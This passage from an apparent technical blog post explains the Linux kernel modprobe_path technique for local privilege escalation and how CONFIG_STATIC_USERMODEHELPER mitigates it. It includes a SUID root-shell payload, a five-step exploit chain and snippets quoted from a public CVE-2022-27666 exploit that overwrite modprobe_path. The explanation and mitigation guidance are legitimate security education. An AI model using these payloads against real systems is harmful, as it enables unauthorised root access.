<p>For reference we can find the following modules in the kernel (where <code>-</code> and <code>_</code> are interchangable in module names): <code>binfmt_elf</code>, <code>binfmt_script</code>, <code>binfmt_aout</code>. If we tried to <code>execve()</code> a binary whose first for bytes were <code>0xFFFFFFFF</code>, the kernel thread handling the <code>execve()</code> syscall would ultimately reach line 30 and try to <code>request_module(&quot;binfmt-FFFFFFFF&quot;)</code>.</p>
<p>If we take a look at how <code>request_module()</code> is implemented, we can see that it is actually a macro for <code>_request_module()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">__request_module</span><span class="p">(</span><span class="kt">bool</span> <span class="n">wait</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="p">...);</span>
</span></span><span class="line"><span class="cl"><span class="cp">#define request_module(mod...) __request_module(true, mod)
</span></span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/kmod.h#L24">include/linux/kmod.h</a> (v5.18.5)</p>
<p>By taking a look at <code>_request_module()</code> we can see that after carrying out the necessary sanity and security checks, that it ultimately calls <code>call_modprobe()</code> [line 29]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/**
</span></span></span><span class="line"><span class="cl"><span class="cm"> * __request_module - try to load a kernel module
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @wait: wait (or not) for the operation to complete
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @fmt: printf style format string for the name of the module
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @...: arguments as specified in the format string
</span></span></span><span class="line"><span class="cl"><span class="cm"> ...
</span></span></span><span class="line"><span class="cl"><span class="cm"> * If module auto-loading support is disabled then this function
</span></span></span><span class="line"><span class="cl"><span class="cm"> * simply returns -ENOENT.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">__request_module</span><span class="p">(</span><span class="kt">bool</span> <span class="n">wait</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">fmt</span><span class="p">,</span> <span class="p">...)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">va_list</span> <span class="n">args</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">char</span> <span class="n">module_name</span><span class="p">[</span><span class="n">MODULE_NAME_LEN</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">modprobe_path</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&gt;=</span> <span class="n">MODULE_NAME_LEN</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">ENAMETOOLONG</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">ret</span> <span class="o">=</span> <span class="nf">security_kernel_module_request</span><span class="p">(</span><span class="n">module_name</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="n">ret</span> <span class="o">=</span> <span class="nf">call_modprobe</span><span class="p">(</span><span class="n">module_name</span><span class="p">,</span> <span class="n">wait</span> <span class="o">?</span> <span class="nl">UMH_WAIT_PROC</span> <span class="p">:</span> <span class="n">UMH_WAIT_EXEC</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/kmod.c#L124">kernel/kmod.c</a> (v5.18.5)</p>
<p>Finally (we&rsquo;re almost there, I promise!) we reach <code>call_modprobe()</code>. I&rsquo;ll avoid spamming you with more source, but for context, <code>[call_usermoderhelper_setup()](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-setup.html)</code> [line 25] prepares the kernel to &ldquo;call a usermode helper&rdquo;, which for us right now essentially means running an executable in userspace as root. <code>[call_usermodehelper_exec()](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-exec.html)</code> [line 30] then does the job.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">static</span> <span class="kt">int</span> <span class="nf">call_modprobe</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">module_name</span><span class="p">,</span> <span class="kt">int</span> <span class="n">wait</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="n">info</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">static</span> <span class="kt">char</span> <span class="o">*</span><span class="n">envp</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;HOME=/&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;TERM=linux&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;PATH=/sbin:/usr/sbin:/bin:/usr/bin&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="nb">NULL</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="kt">char</span> <span class="o">**</span><span class="n">argv</span> <span class="o">=</span> <span class="nf">kmalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">[</span><span class="mi">5</span><span class="p">]),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">argv</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">module_name</span> <span class="o">=</span> <span class="nf">kstrdup</span><span class="p">(</span><span class="n">module_name</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">module_name</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">free_argv</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">modprobe_path</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;-q&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;--&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">module_name</span><span class="p">;</span>	<span class="cm">/* check free_modprobe_argv() */</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">info</span> <span class="o">=</span> <span class="nf">call_usermodehelper_setup</span><span class="p">(</span><span class="n">modprobe_path</span><span class="p">,</span> <span class="n">argv</span><span class="p">,</span> <span class="n">envp</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">					 <span class="nb">NULL</span><span class="p">,</span> <span class="n">free_modprobe_argv</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">info</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">free_module_name</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">call_usermodehelper_exec</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">wait</span> <span class="o">|</span> <span class="n">UMH_KILLABLE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>On lines 19-23 you can see the argument vector we&rsquo;re using. So in our current context of a typical Linux system these days, trying to execute a binary beginning <code>0xFFFFFFFF</code>, as an unprivileged user we&rsquo;d ultimately be running the bash equivalent of:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">root# /usr/bin/modprobe -q -- binfmt-FFFFFFFF   
</span></span></code></pre></div><p>Where <code>/usr/bin/modprobe</code> is the value found in the kernel symbol <code>modprobe_path</code>.</p>
<p>What&rsquo;s important here is that the binary being executed in this root process is defined by the value of the kernel symbol <code>modprobe_path</code>.</p>
<h3 id="a-pseudo-case-study">A Pseudo Case-Study</h3>
<p>To recap what we&rsquo;ve covered so far:</p>
<ul>
<li>An unprivileged user can create a binary starting <code>0xFFFFFFFF</code> and try to <code>execve()</code> it, causing the kernel to create a root process running the equivalent of <code>$modprobe_path -q -- binfmt-FFFFFFFF</code>, where <code>$modprobe_path</code> here is the value stored in the kernel symbol <code>modprobe_path</code></li>
<li>As a result, if an attacker can control <code>modprobe_path</code> then they can control the binary being executed by the root process</li>
</ul>
<p>Wait, so we need to overwrite a kernel symbol? If we can already do that haven&rsquo;t we already won?! Valid questions! The kernel is vast and complex, as such so is kernel exploitation - there are many types of bugs and ways to achieve privilege escalation.</p>
<p>Similarly, the motivations and goals of attackers varies. As we&rsquo;re looking at LPEs, let&rsquo;s assume the goal here is to go from unprivileged user to having root access.</p>
<p><img src="https://sam4k.com/content/images/2022/06/image-5.png" alt=""></p>
<p>Take this (very) simplistic view where we have a kernel memory corruption vulnerability, such as a heap buffer overflow. Ideally, we&rsquo;re able to leverage this to gain a control flow hijacking primitive (CFHP), where we can influence the flow of kernel code execution; say we manage to use our overflow to corrupt a pointer[6] and go from there.</p>
<p>If we can use our CFHP to overwrite arbitrary kernel addresses, we can use the <code>modprobe_path</code> technique we&rsquo;ve talked about to make the final pivot from kernel code execution to having root access in userspace (which is much more usable lol).</p>
<p>How, you ask? Well, first things first let&rsquo;s take a look at an example of a typical binary we can overwrite &amp; point <code>modprobe_path</code> to:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;cp /usr/bin/sh /tmp/sh&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chown root:root /tmp/sh&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chmod 4755 /tmp/sh&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>This payload sets the owner of <code>/tmp/sh</code> as root [4], and then gives it the SUID bit [6].</p>
<p>This bit means that regardless of runs the file, it runs with the owners permissions. In this instance,, if a user runs <code>/tmp/sh</code> after this, it will get a root shell<a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">[7]</a>.</p>
<p>So, to wrap our pseudo case-study up, our overall exploit chain might look like this:</p>
<ol>
<li>Create a binary (e.g. <code>/tmp/trigger</code>) to trigger the execution of <code>modprobe_path</code> as root via the kernel&rsquo;s usermodehelper, by starting it with bytes <code>0xFFFFFFFF</code></li>
<li>Compile &amp; place the payload from the snippet above (e.g. <code>/tmp/pwn</code>)</li>
<li>Trigger our arbitrary address write (e.g. via some kernell mem corruption bug), using the AAW primitive to overwrite <code>modprobe_path</code> with our payload, <code>/tmp/pwn</code></li>
<li>Execute <code>/tmp/trigger</code>, which will cause the kernel to run <code>/tmp/pwn</code> (the new value of <code>modprobe_path</code>) as root</li>
<li>As an unprivileged user we can now get a root shell by running <code>/tmp/sh</code> which is now a SUID executable owned by root</li>
</ol>
<h4 id="actual-examples">Actual Examples</h4>
<p><img src="https://sam4k.com/content/images/2022/07/welcome_to_the_real_world.gif" alt=""></p>
<p>So we&rsquo;ve covered a hasty pseudo-case study of how an attacker might use this <code>modprobe_path</code> technique to escalate privileges via a kernel AAW. Below are a few recent real-world write-ups and examples of this technique put to use:</p>
<ol>
<li><a href="https://etenal.me/archives/1825">CVE-2022-27666: Exploit esp6 modules</a> in Linux kernel by <a href="https://twitter.com/ETenal7">@Etenal7</a></li>
<li><a href="https://www.willsroot.io/2022/01/cve-2022-0185.html">CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google&rsquo;s KCTF Containers</a> by <a href="https://twitter.com/cor_ctf">@cor_ctf</a></li>
<li><a href="https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/">Linux Kernel Exploitation Technique: Overwriting modprobe_path</a> by <a href="https://twitter.com/_lkmidas">@_lkmidas</a></li>
</ol>
<h5 id="cve-2022-27666-by-etenal7">CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></h5>
<p>I&rsquo;ve actually retroactively added this section after finishing the post, figuring it can&rsquo;t hurt to explore some real-world <a href="https://github.com/plummm/CVE-2022-27666">exploit code</a> making use of this technique.</p>
<p>So using what we&rsquo;ve learnt so far, particularly from our pseudo-case study, let&rsquo;s see how <a href="https://twitter.com/ETenal7">@Etenal7</a> makes use of this technique in their exploit (repo <a href="https://github.com/plummm/CVE-2022-27666">here</a>).</p>
<p>To read more on the memory corruption side of things and how they get an AAW primitive to be able to overwrite <code>modprobe_path</code>, check out the awesome <a href="https://etenal.me/archives/1825">write-up</a>. The tl;dr is they exploit a 8-page heap overflow (CVE-2022-27666), do some neat heap feng shui with the page allocator and the slab allocator, to ultimately gain a KASLR leak and AAW primitive.</p>
<p>Diving in, first of all we can see a similar payload in the file <code>[get_rooot.c](https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c)</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chown root:root /tmp/myshell&#34;</span><span class="p">);</span>       <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chmod 4755 /tmp/myshell&#34;</span><span class="p">);</span>            <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;/usr/bin/touch /tmp/exploited&#34;</span><span class="p">);</span>      <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c">get_rooot.c</a></p>
<p>Besides creating a root owned [0] SUID [1] shell, they also create a marker file <code>/tmp/exploited</code> to easily check the payload has been run later [2].</p>
<p>Moving onto the core exploit logic, over in <code>[poc.c](https://github.com/plummm/CVE-2022-27666/blob/main/poc.c)</code>, we can see the setup of the invalid binary used to eventually trigger <code>modprobe_path</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="cp">#define PROC_MODPROBE_TRIGGER &#34;/tmp/modprobe_trigger&#34;
</span></span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">modprobe_trigger</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="nf">execve</span><span class="p">(</span><span class="n">PROC_MODPROBE_TRIGGER</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">modprobe_init</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="nf">open</span><span class="p">(</span><span class="n">PROC_MODPROBE_TRIGGER</span><span class="p">,</span> <span class="n">O_RDWR</span> <span class="o">|</span> <span class="n">O_CREAT</span><span class="p">);</span>      <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">  <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="p">{</span>
</span></span><span class="line"><span class="cl">      <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;trigger creation failed&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">      <span class="nf">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl">  <span class="kt">char</span> <span class="n">root</span><span class="p">[]</span> <span class="o">=</span> <span class="s">&#34;</span><span class="se">\xff\xff\xff\xff</span><span class="s">&#34;</span><span class="p">;</span>                            
</span></span><span class="line"><span class="cl">  <span class="nf">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">root</span><span class="p">));</span>                               <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">  <span class="nf">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="nf">chmod</span><span class="p">(</span><span class="n">PROC_MODPROBE_TRIGGER</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span>                          <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></p>
<p>We can see they programmatically create the <code>modprobe_path</code> trigger in <code>modprobe_init()</code>, creating an executable [2] at path <code>PROC_MODPROBE_TRIGGER</code> [0] which simply consists of an invalid 4 byte header, <code>&quot;\xff\xff\xff\xff&quot;</code> [1].</p>
<p>This can later be triggered to make the kernel execute, the hopefully overwritten,<code>modprobe_path</code> via <code>modprobe_trigger()</code>.</p>
<p>Below I&rsquo;ve highlighted the code responsible for performing the AAW, triggering the corrupted <code>modprobe_path</code> and finally popping the payload:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">char</span> <span class="o">*</span><span class="n">evil_str</span> <span class="o">=</span> <span class="s">&#34;/tmp/get_rooot</span><span class="se">\x00</span><span class="s">&#34;</span><span class="p">;</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="p">(</span><span class="n">from</span> <span class="n">fuse_evil</span><span class="p">.</span><span class="n">c</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">overwrite_modprobe</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="kt">void</span> <span class="o">*</span><span class="n">modprobe_path</span> <span class="o">=</span> <span class="n">addr_modprobe_path</span> <span class="o">+</span> <span class="n">kaslr_offset</span><span class="p">;</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">  <span class="p">...</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">    <span class="nf">arb_write</span><span class="p">(</span><span class="n">modprobe_path</span><span class="o">-</span><span class="mi">8</span><span class="p">,</span> <span class="nf">strlen</span><span class="p">(</span><span class="n">evil_str</span><span class="p">),</span> <span class="p">...);</span>     <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">    <span class="nf">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">modprobe_trigger</span><span class="p">();</span>                                    <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">am_i_root</span><span class="p">())</span> <span class="p">{</span>                                     <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">      <span class="p">...</span>                                                  <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[+] Not root, try again</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl">  <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">am_i_root</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="k">struct</span> <span class="n">stat</span> <span class="n">buffer</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">  <span class="kt">int</span> <span class="n">exist</span> <span class="o">=</span> <span class="nf">stat</span><span class="p">(</span><span class="s">&#34;/tmp/exploited&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buffer</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="k">if</span><span class="p">(</span><span class="n">exist</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">      <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">  <span class="k">else</span>  
</span></span><span class="line"><span class="cl">      <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></p>
<p>First they use the leaked KALSR offset to work out the address of the <code>modprobe_path</code> kernel symbol [1]. Next, the AAW is triggered [2], overwriting the original value of <code>modprobe_path</code> with the path to the payload, <code>/tmp/get_rooot</code> [0].</p>
<p>Then, with <code>modprobe_path</code> hopefully overwritten, they call <code>modprobe_trigger()</code> [3] to execute tbe invalid binary so the kernel ultilmately executes the new <code>modprobe_path</code>.</p>
<p>Finally <code>am_i_root()</code> is called to check for success by looking for the marker file <code>/tmp/exploited</code> that is created when the payload <code>/tmp/get_rooot</code> is run by <code>usermodehelper</code>. If it exists, we can pop a shell [5].</p>
<h3 id="mitigations">Mitigations</h3>
<p>Now we have an understanding of the technique, how it&rsquo;s used to facilitate LPE and some examples of real-world usecases &hellip; how do we mitigate it?</p>
<p><code>CONFIG_STATIC_USERMODEHELPER</code> was introduced in 4.11[8], back in 2017 by <a href="https://twitter.com/gregkh">Greg KH</a>[9], specifically to mitigate this kind of attack surface.</p>
<h4 id="one-helper-to-rule-them-all">One Helper to Rule Them All</h4>
<p><img src="https://sam4k.com/content/images/2022/07/gollum_scared.gif" alt=""></p>
<p>Looking at <code>call_modprobe()</code> earlier, the kernel specifies an executable path via <code>call_usermodehelper_setup(path, ...)</code> and then <code>call_usermodehelper_exec()</code> will execute the binary specified by <code>path</code>. Relevant to us, is that <code>modprobe_path</code> is passed to <code>call_usermodehelper_setup()</code> and we can change <code>modprobe_path</code>.</p>
<p>With this config enabled, regardless of the <code>path</code> passed to <code>call_usermodehelper_setup()</code>, the kernel will only directly execute a single usermode binary defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code>[10]. This path is read-only, so can&rsquo;t be changed (without write protection bit flipping shenanigans[11]).</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="nf">call_usermodehelper_setup</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="p">...)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="n">sub_info</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_STATIC_USERMODEHELPER
</span></span></span><span class="line"><span class="cl">	<span class="n">sub_info</span><span class="o">-&gt;</span><span class="n">path</span> <span class="o">=</span> <span class="n">CONFIG_STATIC_USERMODEHELPER_PATH</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#else
</span></span></span><span class="line"><span class="cl">	<span class="n">sub_info</span><span class="o">-&gt;</span><span class="n">path</span> <span class="o">=</span> <span class="n">path</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/umh.c#L358">kernel/umh.c</a> (v5.18.5)</p>
<p>It is then the task of the static executable defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> to call the appropriate usermode helper, e.g. <code>/usr/bin/modprobe</code>.</p>
<p>Alternatively, <code>CONFIG_STATIC_USERMODEHELPER</code> can be enabled but <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> can be set to <code>&quot;&quot;</code>, disabling all usermode helper programs entirely; completely mitigating the <code>modprobe_path</code> technique.</p>
<h4 id="so-were-all-good">So We&rsquo;re All Good?</h4>
<p><img src="https://sam4k.com/content/images/2022/07/whats_the_big_deal.gif" alt=""></p>
<p>Awesome, you mean this whole thing was patched back in 2017? EZ PZ, next technique pls. Not so fast! Despite being introduced into the kernel back 4.11 it still hasn&rsquo;t made it&rsquo;s way into the default configurations for many popular distributions.</p>
<p>As of writing, this includes the latest versions of Ubuntu, Fedora and EndeavourOS; I&rsquo;m sure there&rsquo;s many more but that&rsquo;s all I know off the top of my head.</p>
<p>You can check your system by searching your config, typically in<code>/boot/config...</code> or <code>/proc/config</code>, for <code>CONFIG_STATIC_USERMODEHELPER</code>. Alternatively I heartily recommend <a href="https://twitter.com/a13xp0p0v">@a13xp0p0v</a>&rsquo;s <a href="https://github.com/a13xp0p0v/kconfig-hardened-check">kconfig-hardened-check</a>.</p>
<p>I don&rsquo;t mean to point fingers though, the Linux ecosystem is vast and complex, with many moving parts and users. I can imagine there&rsquo;s plenty of components that make assumptions about/rely on <code>usermodehelper</code>, making removing it outright (via not setting <code>CONFIG_STATIC_USERMODEHELPER_PATH</code>) difficult?</p>
<p>The alternative is to implement the single usermode helper, in such as a way as to securely carry out the same functionality for users of <code>usermodehelper</code> while still mitigating similar attack surfaces and not introducing new ones.</p>
<h4 id="alternatives">Alternatives</h4>
<p><code>CONFIG_STATIC_USERMODEHELPER</code> isn&rsquo;t the only way to mitigate this technique, but it is one of the more direct, having been designed with this attack surface in mind.</p>
